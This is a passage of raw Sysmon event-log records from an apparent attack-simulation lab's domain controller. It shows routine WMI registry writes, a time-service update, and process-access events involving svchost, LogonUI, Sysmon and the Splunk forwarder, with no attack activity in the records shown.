13241300x80000000000000004497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\en-US\ACPI.sys.mui[ACPIMOFResource]LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully 13241300x80000000000000004496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\System32\drivers\ACPI.sys[ACPIMOFResource]LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully 13241300x80000000000000004495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\en-US\kernelbase.dll.mui[MofResourceName]LowDateTime:1470350432,HighDateTime:30846383***Binary mof compiled successfully 13241300x80000000000000004494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE\C:\Windows\system32\kernelbase.dll[MofResourceName]LowDateTime:-1965991328,HighDateTime:30841156***Binary mof compiled successfully 12241200x80000000000000004493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashDeleteKey2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\WDM\DREDGE 13241300x80000000000000004492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2021-01-14 13:13:43.314{08A6967A-4379-6000-FA00-000000009A01}2516\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance DataBinary Data 13241300x80000000000000004505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:13:44.533{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea77-0x16036e20) 10341000x80000000000000004507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:48.051{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:48.051{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0E00-000000009A01}1076C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004534Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.860{08A6967A-43A7-6000-FC00-000000009A01}46684692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004533Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43A7-6000-FC00-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004532Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004531Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-43A7-6000-FC00-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.719{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-43A7-6000-FC00-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.720{08A6967A-43A7-6000-FC00-000000009A01}4668C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-43A7-6000-FB00-000000009A01}4732C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004518Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004517Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004516Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004515Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:14:15.047{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 